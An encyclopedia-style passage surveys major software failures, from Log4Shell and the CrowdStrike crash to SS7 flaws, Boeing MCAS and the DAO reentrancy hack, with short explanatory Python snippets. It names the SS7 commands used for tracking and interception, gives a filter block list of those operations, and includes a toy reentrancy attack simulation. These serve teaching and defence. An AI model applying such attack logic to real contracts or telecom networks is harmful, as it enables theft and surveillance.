The vulnerability was privately reported to Apache in late November 2021, with MITRE assigning the CVE identifier on November 26.[60] Public disclosure occurred on December 9, 2021, coinciding with immediate exploitation attempts observed in the wild by security researchers.[61] Apache responded by releasing version 2.15.0 on December 6 as an initial patch, which disabled remote JNDI lookups by default but proved insufficient against variants, prompting further updates including 2.16.0 on December 13 and 2.17.0 on December 28 for comprehensive remediation via configuration changes and removal of the message lookups feature; administrators of older deployments were also advised to strip the JndiLookup class from the classpath.[62] The U.S. Cybersecurity and Infrastructure Security Agency (CISA) issued alerts on December 10, urging immediate scanning and patching, while noting active exploitation by state-sponsored actors and cybercriminals.[58]
Exploitation requires no authentication and leverages common logging of user inputs, such as usernames or HTTP headers, making it trivially achievable via crafted payloads referencing attacker-controlled servers over protocols including LDAP, RMI, or DNS.[63] Attackers could deploy malware, ransomware, or backdoors, with real-world incidents including compromises of Minecraft servers, cloud infrastructure, and corporate networks shortly after disclosure.[64] Affected systems spanned millions of Java-based applications, from on-premises servers to services like Apple iCloud, Steam, and various AWS components, amplifying supply-chain risks due to Log4j's ubiquity in dependencies.[65]
Remediation efforts emphasized upgrading to Log4j 2.17.1 or later, setting system properties like log4j2.formatMsgNoLookups=true, and implementing network blocks on outbound JNDI traffic, though legacy systems and embedded devices posed patching challenges.[66] Follow-on vulnerabilities like CVE-2021-45046, which showed the initial 2.15.0 fix to be incomplete and was addressed in 2.16.0, underscored the difficulty of patching under pressure, leading to coordinated vulnerability disclosures and tools for detection via signature-based scans.[62] As of 2024, residual unpatched instances persist in approximately 12% of scanned Java applications, highlighting ongoing risks from delayed updates in complex ecosystems.[67] The incident exposed systemic issues in open-source dependency management, prompting enhanced scrutiny of logging libraries and automated patching in software supply chains.[68]
Enterprise and Cloud Computing
CrowdStrike Falcon Sensor Update Failure (2024)
The CrowdStrike Falcon sensor update failure occurred on July 19, 2024, when a defective configuration file in a rapid response content update for the Falcon endpoint detection and response (EDR) software caused widespread crashes on Microsoft Windows systems. The update, deployed at 04:09 UTC, affected Windows hosts running Falcon sensor version 7.11 or later that were online during a brief window until its reversion at 05:27 UTC. Microsoft estimated that approximately 8.5 million Windows devices were impacted, representing less than 1% of all Windows machines globally but concentrated in enterprise environments due to Falcon's primary use by organizations. macOS and Linux systems were unaffected, as the sensor implementation differed.[69][70] The root cause was a logic error in the Falcon sensor's Content Interpreter module within the Windows kernel driver (csagent.sys), where an out-of-bounds memory read occurred during processing of channel file 291. This file, part of an update aimed at detecting malicious use of Windows interprocess communication (named pipes), contained non-wildcard criteria that referenced a 21st input parameter in the IPC Template Type, but the sensor code provided only 20 inputs, leading to an unhandled exception and blue screen of death (BSOD) crashes. The defect originated from inadequate validation in the content deployment pipeline: the Content Validator tool failed to detect the mismatch, as it lacked runtime bounds checking and relied on assumptions about input fields without compile-time enforcement. Testing had covered wildcard scenarios but not the specific non-wildcard conditions that triggered the bug, exposing a gap in test coverage for edge cases in the sensor's interpretation logic.[71][70] Recovery required manual intervention, as the crashes prevented remote fixes; affected systems had to be booted into Windows Recovery Environment or safe mode to delete the faulty file (C-00000291*.sys) from the CrowdStrike directory. 
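The class of defect is straightforward to illustrate. This hypothetical Python sketch (not CrowdStrike's actual kernel code) models a template interpreter that enforces the runtime bounds check the root cause analysis found missing; in unchecked C kernel code, the equivalent out-of-bounds read dereferences invalid memory and crashes the machine:

```python
def read_input(inputs, index):
    """Return the template input at `index`, refusing out-of-bounds reads.

    The explicit range check below stands in for the runtime bounds
    validation that was absent from the content interpreter.
    """
    if not 0 <= index < len(inputs):
        raise IndexError(f"input index {index} out of range for {len(inputs)} inputs")
    return inputs[index]

provided = [f"input_{i}" for i in range(20)]   # the sensor supplied 20 inputs
print(read_input(provided, 19))                # last valid parameter: input_19
try:
    read_input(provided, 20)                   # content referenced a 21st input
except IndexError as e:
    print("blocked:", e)
```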
CrowdStrike issued technical guidance within hours and collaborated with Microsoft to develop automated remediation tools for cloud environments like Azure. By July 29, 2024, approximately 99% of affected sensors had recovered to pre-incident levels. The incident disrupted critical sectors: airlines such as Delta Air Lines canceled over 3,500 flights and incurred costs exceeding $500 million; healthcare providers faced emergency system outages; and financial services experienced payment processing delays. Economic analyses estimated direct losses to Fortune 500 companies at $5.4 billion, with broader global impacts in the tens of billions, though exact figures vary due to indirect effects like productivity halts.[70][69][72] In response, CrowdStrike's root cause analysis identified systemic issues, including over-reliance on a single validation stage and absence of staged rollouts for content updates. Remediation included adding compile-time input validation (deployed July 27, 2024), runtime bounds checks, expanded fuzzing and fault injection testing for non-wildcard scenarios, and mechanisms for customer-controlled update pacing. The event prompted regulatory scrutiny, including a U.S. House Homeland Security Committee hearing in September 2024, and multiple class-action lawsuits alleging negligence in testing. It underscored risks in third-party kernel-level software dependencies, where a single vendor's update can cascade failures across interconnected enterprise ecosystems without built-in safeguards like diversified EDR usage or offline validation.[71]
Telecommunications and Networking
AT&T Network Outage (1990)
The AT&T network outage occurred on January 15, 1990, beginning at 2:25 p.m. EST, when a trunk interface unit in a Manhattan switching center experienced a hardware fault during routine operations.[73] This triggered the system's recovery procedures across AT&T's long-distance network, which handled approximately 70% of U.S. long-distance traffic at the time.[74] Within minutes, the failure cascaded, disabling half of the network's 114 electronic switches and blocking over 50 million calls during the nine-hour disruption that ended around 11:30 p.m.[74] The incident resulted in an estimated $60 million loss in unconnected calls for AT&T, with broader economic ripple effects including delayed airline flights and disrupted business operations.[74][75] The root cause was a single-line software bug introduced in a mid-December 1989 update to the recovery code for the 4ESS switches, written in C.[74] Specifically, the bug involved a misplaced break statement inside an if clause nested within a switch statement's error-recovery case; when two call-related messages arrived within 1/100th of a second, the break caused the program to exit the enclosing logic prematurely, skipping essential data restoration and instead overwriting critical parameters.[74][73] This led to improper switch resets, where affected switches dumped active calls and flooded adjacent switches with error notifications and backlogged traffic, initiating an iterative failure loop across the interconnected network despite built-in self-healing mechanisms.[74]
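The failure mode can be modeled abstractly. The following Python toy (hypothetical, not AT&T's 4ESS code) shows how an early exit taken only under a rare timing condition leaves shared state unrestored, which is why the bug survived testing and only surfaced under real traffic:

```python
def handle_messages(messages, gap_s):
    """Toy model of the 4ESS-style defect: a premature early exit skips the
    state-restoration step when two messages arrive within 0.01 s."""
    state = {"restored": True}
    for i, msg in enumerate(messages):
        state["restored"] = False      # recovery begins: state temporarily invalid
        if i > 0 and gap_s < 0.01:
            break                      # misplaced break: exits before restoration
        state["restored"] = True       # essential data restoration
    return state["restored"]

print(handle_messages(["msg1", "msg2"], gap_s=1.0))    # True  — normal operation
print(handle_messages(["msg1", "msg2"], gap_s=0.005))  # False — state left corrupt
```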
Engineers at AT&T's network operations centers identified the flaw by analyzing logs and reverted the switches to the prior software version, stabilizing the system.[73] Initial suspicions of sabotage or hacking delayed diagnosis, as the uniform failure pattern across geographically dispersed switches suggested external interference, but internal audits confirmed the software error.[73] The outage exposed vulnerabilities in large-scale distributed systems, where localized faults could propagate globally due to tight coupling and inadequate simulation of rare timing conditions during testing.[74] AT&T subsequently enhanced code review processes and fault isolation, though the event underscored the challenges of ensuring robustness in complex telecommunications infrastructure reliant on unproven software changes.[74]
Signaling System 7 Vulnerabilities
The Signaling System 7 (SS7) protocol suite governs signaling in global telecommunications networks for functions such as call routing, SMS delivery, and mobile roaming, and was originally specified in the 1980s by the International Telecommunication Union for use in trusted, closed carrier environments lacking modern security protocols like mutual authentication or encryption.[76] This foundational design assumption—pre-dating widespread internet interconnectivity—enables attackers with SS7 network access, often obtained via compromised or rogue telecom operators, to impersonate legitimate nodes and issue unauthorized queries or redirects without detection.[77] Public awareness of these flaws emerged in 2008 through initial security research presentations, with systematic demonstrations beginning around 2010 by firms like Security Research Labs (SRLabs).[78] By 2014, German researcher Karsten Nohl publicly showcased live exploits at hacker conferences, including tracking mobile locations and intercepting communications, highlighting how SS7's trust-based architecture permits global-scale abuse without user consent or awareness.[79] Key vulnerabilities stem from exploitable SS7 message types, such as MAP (Mobile Application Part) operations, which allow:
- Location tracking: Attackers query a target's position via commands like SendRoutingInfoForSM or AnyTimeInterrogation (ATI), achieving accuracy to within a cell tower's range (often hundreds of meters in urban areas), as demonstrated in SRLabs tests on European networks in 2014–2016.[80][77]
- Call and SMS interception: By inserting themselves as a man-in-the-middle using UpdateLocation or InsertSubscriberData, intruders can eavesdrop on voice traffic or divert SMS, including two-factor authentication codes, bypassing end-to-end encryption in apps like WhatsApp if reliant on SMS fallback.[81]
- Fraud and denial-of-service: Manipulation of subscriber data enables call forwarding to attacker-controlled numbers or subscription changes, facilitating financial theft; for instance, in May 2017, hackers exploited SS7 to intercept German bank SMS verifications, draining accounts in real-time operations traced to organized crime groups.[81]
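Carrier defenses against these abuses center on filtering MAP traffic at network borders. The following Python sketch (with hypothetical operation and peer names) illustrates the basic shape of an SS7 firewall rule that drops sensitive operations arriving from untrusted origins; production filtering is far more nuanced, distinguishing legitimate roaming signaling from probes:

```python
# Hypothetical, simplified SS7 firewall rule: block location-tracking and
# interception-related MAP operations from peers outside a trust list.
SENSITIVE_OPS = {"AnyTimeInterrogation", "SendRoutingInfoForSM",
                 "UpdateLocation", "InsertSubscriberData"}
TRUSTED_PEERS = {"home-hlr.example.net", "roaming-partner.example.net"}

def allow_map_message(operation: str, origin_peer: str) -> bool:
    """Return False for sensitive MAP operations from untrusted peers."""
    if operation in SENSITIVE_OPS and origin_peer not in TRUSTED_PEERS:
        return False                 # drop: likely tracking/interception probe
    return True

print(allow_map_message("AnyTimeInterrogation", "unknown-gt.example.org"))  # False
print(allow_map_message("UpdateLocation", "roaming-partner.example.net"))   # True
```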
Transportation Systems
Toyota Unintended Acceleration (2009-2010)
The Toyota unintended acceleration incidents, peaking in 2009-2010, involved numerous reports of vehicles suddenly accelerating without driver input, primarily in models equipped with the Electronic Throttle Control System with intelligence (ETCS-i), a drive-by-wire system introduced in various Toyota and Lexus models since the early 2000s. By late 2009, the National Highway Traffic Safety Administration (NHTSA) had received over 2,000 complaints alleging sudden unintended acceleration (SUA), linked to at least 21 deaths and hundreds of injuries across models like the Camry, Prius, and Avalon.[85] Toyota responded with massive recalls totaling nearly 8 million vehicles in the United States: in November 2009, roughly 5.4 million for floor mats that could trap the accelerator pedal; and in January 2010, another 2.3 million for sticky accelerator pedals that might bind due to friction or wear.[85] These mechanical issues were identified as potential contributors, but allegations persisted that ETCS-i software flaws could independently cause throttle valves to open fully, overriding driver commands.[86] NHTSA launched a formal defects investigation in September 2009, expanding it to include electronic systems amid congressional scrutiny and high-profile crashes, such as an August 2009 Lexus ES 350 collision on a California highway that killed four, including a state police officer.[85] To assess ETCS-i, NHTSA contracted NASA engineers, who conducted extensive testing on vehicle components, software simulations, and electromagnetic interference scenarios from February 2010 to late 2010. 
The resulting February 2011 report concluded there were no electronic defects or software vulnerabilities capable of producing the large throttle openings (near 100%) required for high-speed SUA incidents; instead, event data recorder (EDR) analyses from crash-involved vehicles consistently showed the accelerator pedal depressed while brakes were not, pointing to driver pedal misapplication under stress.[86][85] NHTSA endorsed these findings, attributing most verified SUA cases to human error or the recalled mechanical defects, and closed the probe without mandating electronic fixes.[87] Debate over ETCS-i software persisted, fueled by independent analyses criticizing its design for lacking redundancy—unlike mechanical linkages in older systems—and exhibiting poor code quality, such as unhandled error conditions and reliance on single microprocessors without fail-safes to default to idle.[88] Software expert Michael Barr, in 2013 court testimony for an Oklahoma wrongful-death suit stemming from a 2009 crash, identified specific bugs in Toyota's source code, including race conditions and memory management flaws, leading a jury to award $3 million in compensatory damages against Toyota on grounds that defective firmware contributed to unintended throttle activation.[89] A 2002 internal Toyota memo, translated and revealed in 2012, documented engineers observing full-throttle acceleration in a pre-production test due to a software anomaly, though Toyota deemed it non-reproducible in production.[90] Toyota paid a $1.2 billion penalty in a March 2014 deferred prosecution agreement with the U.S. Department of Justice, admitting to misleading regulators about the severity of the mechanical defects while denying electronic causation, and separately settled hundreds of SUA claims; critics, including some automotive safety researchers, argue the settlements and code critiques indicate underreported software risks, though federal probes found no causal link to widespread incidents.[91][92]
Boeing 737 MAX MCAS Software Issue (2018-2019)
The Maneuvering Characteristics Augmentation System (MCAS) in the Boeing 737 MAX was a software-driven flight control feature designed to automatically adjust the horizontal stabilizer trim in response to angle-of-attack (AoA) sensor data, compensating for the aircraft's increased pitch-up tendency caused by larger, forward-mounted engines compared to prior 737 variants.[93] MCAS activated during high AoA conditions to apply nose-down trim, but its logic processed input from only one of two available AoA sensors without cross-checking for discrepancies, allowing a single faulty sensor reading to trigger erroneous commands.[94] This design choice, intended to simplify certification by avoiding pilot retraining on the 737 NG flight envelope, lacked safeguards against persistent activation; once triggered, MCAS could re-engage multiple times per flight even after pilot override attempts, as the stabilizer trim motors were powerful enough to overcome manual counter-efforts under certain aerodynamic loads.[95] Boeing's system safety assessments underestimated the risk of uncommanded MCAS operation, classifying it as no worse than "hazardous" and assuming pilots would recognize and counteract it using existing runaway trim procedures, without disclosing MCAS's repeated activation potential or full reliance on a single sensor.[96] The flaw manifested in Lion Air Flight 610 on October 29, 2018, when the Boeing 737 MAX 8 (PK-LQP) crashed into the Java Sea 13 minutes after takeoff from Jakarta, Indonesia, killing all 189 aboard; a damaged AoA sensor provided erroneous high-reading input, causing MCAS to command repeated nose-down trim that pilots partially countered but ultimately could not fully overcome amid competing stick shaker warnings and unreliable airspeed indications.[97] The aircraft's prior flight had experienced similar MCAS activations due to the same sensor issue, which maintenance failed to fully diagnose despite partial troubleshooting.[98] Indonesia's National 
Transportation Safety Committee final report identified the faulty AoA sensor and MCAS as contributing factors in a chain including maintenance errors, weight/misrigging discrepancies, and pilot responses, but emphasized the system's design vulnerability to single-point failures without adequate pilot awareness or cockpit indications for MCAS-specific faults.[97][99] A similar sequence unfolded in Ethiopian Airlines Flight 302 on March 10, 2019, with the 737 MAX 8 (ET-AVJ) crashing six minutes after departing Addis Ababa, Ethiopia, killing all 157 occupants; erroneous AoA data again prompted MCAS to apply unrelenting nose-down trim, which the crew attempted to neutralize using electric trim switches and the cutoff switches, but the system's re-activations during manual flight overwhelmed their efforts despite following Boeing's recommended procedures.[100] Ethiopia's Aircraft Accident Investigation Bureau preliminary findings highlighted flawed sensor data triggering MCAS as a central element, while the final report noted production-related sensor anomalies but maintained that MCAS's response exacerbated the loss of control.[101] The U.S. National Transportation Safety Board critiqued aspects of the Ethiopian analysis for underemphasizing sensor production quality issues but concurred that MCAS design assumptions about pilot intervention were inadequate given the lack of training or documentation on its multi-cycle behavior.[102] These incidents exposed broader certification shortcomings, as the Federal Aviation Administration had delegated significant oversight to Boeing under its Organization Designation Authorization program, leading to incomplete MCAS risk disclosures and flawed hazard analyses that did not fully model single-sensor failure scenarios.[96] A U.S. 
House investigation revealed Boeing engineers had identified but downplayed MCAS dependencies during development, prioritizing cost and schedule to match Airbus A320neo competition, resulting in software that treated AoA discrepancies as valid rather than anomalous.[103] Global regulators grounded the 737 MAX fleet starting March 11-13, 2019, affecting over 380 aircraft; Boeing's remedial software update, certified in late 2020, incorporated dual AoA sensor inputs with disagreement logic, rate limiting on trim commands, and revised pilot alerts, enabling return to service after 20 months.[94] The episode underscored risks in automating critical flight controls without robust failure-mode redundancies, with post-accident data indicating MCAS's original implementation violated first-order engineering principles by amplifying hardware faults into systemic instability.[93][95]
Media and Gaming
Nintendo Wii Remote Strap Failure (2006, software interaction)
The Nintendo Wii Remote wrist strap failures emerged as a prominent issue following the console's launch on November 19, 2006, primarily during gameplay involving motion controls that required users to swing the controller vigorously, such as in the bundled Wii Sports title simulating tennis, bowling, and boxing.[104] The strap, a nylon cord designed to secure the battery-powered Remote to the user's wrist, frequently snapped under the tension of these physical gestures, causing the device to detach and strike nearby objects like televisions, walls, or furniture.[105] Incidents were exacerbated by the software's reliance on full-body mimicry of real-world actions to register inputs via the Remote's embedded accelerometer, which detected orientation and acceleration but imposed no algorithmic limits on swing velocity or force to prevent hardware stress.[104] This interaction between the motion-sensing software mechanics—intended to deliver intuitive, immersive control—and the strap's material limitations turned routine play into a risk factor, with users following on-screen prompts for exaggerated motions without built-in safeguards like dynamic sensitivity scaling or haptic feedback thresholds to mitigate overexertion.[106] By early December 2006, Nintendo had received over 100 reports of strap breakages in the United States alone, including instances of property damage estimated in the thousands of dollars per case and three minor injuries not requiring medical treatment, all linked to Wii Sports sessions.[104] The company's investigation attributed failures to cords fraying or tearing when subjected to "excessive force" during swings, a scenario directly prompted by software-driven gameplay loops that rewarded amplitude in motion for accurate input registration.[105] On December 15, 2006, Nintendo announced a voluntary replacement program for the original straps bundled with approximately 3.2 million Wii Remotes sold worldwide up to that point, shipping thicker, 
more durable versions at no cost to owners; the initiative stemmed from consumer complaints and preemptive measures to avoid broader liability, though Nintendo denied it constituted a formal recall.[107] Class-action lawsuits followed, alleging defective design and inadequate warnings, with plaintiffs claiming the Remote's software encouraged behaviors that foreseeably overwhelmed the hardware, such as rapid, full-arm extensions without velocity caps in the input processing algorithms.[108] In response, Nintendo issued usage guidelines emphasizing proper strap attachment and moderate swinging, later incorporating on-screen safety prompts in some titles to remind players of risks, though no firmware updates altered core motion detection logic to enforce safer interaction parameters.[109] The episode highlighted a systems-level oversight where software innovation prioritizing accessibility and physical engagement outpaced hardware robustness testing under simulated peak loads, resulting in widespread failures despite the Remote's otherwise reliable Bluetooth-based pointing and acceleration tracking.[110] Despite the disruptions, Wii sales remained strong, with the strap program costing Nintendo around $1 million but underscoring the trade-offs in early motion-control paradigms that lacked integrated error-handling for peripheral strain.[110]
Cyberpunk 2077 Launch Bugs (2020)
Cyberpunk 2077, developed by CD Projekt Red, launched on December 10, 2020, for Microsoft Windows, PlayStation 4, PlayStation 5, Xbox One, Xbox Series X/S, and Stadia, following multiple delays from its original 2019 target.[111] The release encountered widespread software bugs, including frequent crashes, clipping through environments, non-functional non-player character (NPC) behaviors, erratic driving physics, and quest progression failures, which compromised core gameplay mechanics across platforms.[112] These issues stemmed from incomplete implementation of promised features, such as dynamic crowd systems and vehicle combat, due to unfinalized underlying code and insufficient testing on console hardware.[112] Performance degradation was most acute on base PlayStation 4 and Xbox One consoles, where frame rates often dropped below 20 FPS, accompanied by severe texture pop-in, reduced draw distances rendering foliage and buildings invisible, and rendering errors making characters or vehicles disappear mid-interaction.[113] Internal developer reports indicated awareness of these optimization shortfalls prior to launch, with staff doubting the game's readiness for 2020 release amid pressure to meet financial milestones, yet proceeding without adequate console-specific refinements.[114] On December 17, 2020, Sony Interactive Entertainment removed the game from the PlayStation Store and initiated full refunds for all digital purchases, citing unacceptable bug levels and performance, marking an unprecedented action against a major title.[115] CD Projekt Red responded with public apologies and a series of hotfixes starting December 2020, addressing crashes and stability, followed by major patches like 1.1 in February 2021 that improved console framerates and reduced load times, though full remediation required over a year of updates.[116] Despite the fallout, the game achieved 13.7 million units sold by year-end 2020, generating over $560 million in revenue, with CD 
Projekt's direct refund program processing approximately 30,000 requests at a cost of $2.23 million, though platform-specific refunds like Sony's added undisclosed volumes.[117] The launch bugs triggered class-action lawsuits alleging misleading marketing of console versions and contributed to a sharp decline in CD Projekt's share price, dropping over 30% in December 2020, underscoring failures in quality assurance processes for cross-platform development.[118] Subsequent patches, including the 2.0 overhaul in 2023, largely resolved persistent issues, enabling the game's return to the PlayStation Store in June 2021 after performance benchmarks met Sony's criteria.[112]
Blockchain and Cryptocurrency
DAO Hack (2016)
The DAO (Decentralized Autonomous Organization) was a venture capital fund implemented as a set of Ethereum smart contracts, designed to allow token holders to collectively fund and govern projects without centralized management. It raised approximately 12 million ETH—valued at around $150 million USD—through an initial coin offering that concluded on May 31, 2016, marking one of the largest crowdfunding efforts in cryptocurrency history at the time.[119][120] On June 17, 2016, an attacker exploited a software vulnerability in The DAO's smart contract code, siphoning 3.6 million ETH (about one-third of the total funds), equivalent to roughly $50 million USD based on contemporaneous Ether prices.[121][122] The bug involved a reentrancy flaw in the splitDAO function, which permitted the creation of "child DAOs" to withdraw investor shares; the contract transferred ETH to the caller's address before updating its internal balance tracking, allowing recursive calls that drained funds multiple times before the state change took effect.[122] This vulnerability arose from inadequate safeguards against recursive external calls in Solidity, the primary language for Ethereum smart contracts, despite prior warnings from security researchers about similar risks in the codebase.[123]
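The reentrancy mechanism, and the checks-effects-interactions pattern that prevents it, can be modeled in a few lines. This Python sketch is a simplified analogy rather than Solidity code: the "external call" is an ordinary callback that re-enters withdraw() before the balance is zeroed.

```python
class VulnerableDAO:
    """Toy model of the flaw: funds are sent *before* the balance is zeroed,
    so a malicious recipient can re-enter withdraw() and drain repeatedly."""
    def __init__(self, balances):
        self.balances = dict(balances)

    def withdraw(self, addr, send):
        amount = self.balances[addr]
        if amount > 0:
            send(amount)               # external call first (the bug)
            self.balances[addr] = 0    # state update happens too late

class SafeDAO(VulnerableDAO):
    """Checks-effects-interactions: update state before the external call."""
    def withdraw(self, addr, send):
        amount = self.balances[addr]   # checks
        self.balances[addr] = 0        # effects: zero the balance first
        if amount > 0:
            send(amount)               # interactions last

def attack(dao, addr, depth=3):
    """Simulate a recipient that re-enters withdraw() up to `depth` times."""
    stolen = []
    def reentrant_send(amount):
        stolen.append(amount)
        if len(stolen) < depth:
            dao.withdraw(addr, reentrant_send)   # re-enter before state update
    dao.withdraw(addr, reentrant_send)
    return sum(stolen)

print(attack(VulnerableDAO({"attacker": 100}), "attacker"))  # 300 — drained 3x
print(attack(SafeDAO({"attacker": 100}), "attacker"))        # 100 — single payout
```

The fix is purely an ordering change, which is why the checks-effects-interactions pattern and dedicated reentrancy guards became standard practice after the incident.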
The exploit unfolded over multiple transactions starting at Ethereum block 1,621,370, with the attacker methodically withdrawing funds into a child DAO under their control, which remained locked until a 28-day delay period due to The DAO's governance rules.[122] Ethereum developers paused contract creation temporarily to analyze the issue, confirming the reentrancy as the root cause rather than a consensus-layer flaw.[124]
To recover the funds, Ethereum's core developers proposed and executed a hard fork on July 20, 2016, at block 1,920,000, which retroactively moved the stolen ETH to a refund contract accessible by original token holders.[125] A minority faction rejected the fork, citing blockchain immutability principles, resulting in a chain split: the forked chain became Ethereum (ETH), while the unaltered original evolved into Ethereum Classic (ETC).[124][119] The event exposed systemic risks in deploying unproven, unaudited smart contracts at scale, influencing subsequent industry standards for formal verification, multi-signature wallets, and reentrancy guards like the checks-effects-interactions pattern.[122] No funds were ultimately lost to the attacker on the dominant Ethereum chain, but the hack underscored causal links between hasty code deployment and catastrophic financial losses in permissionless systems.
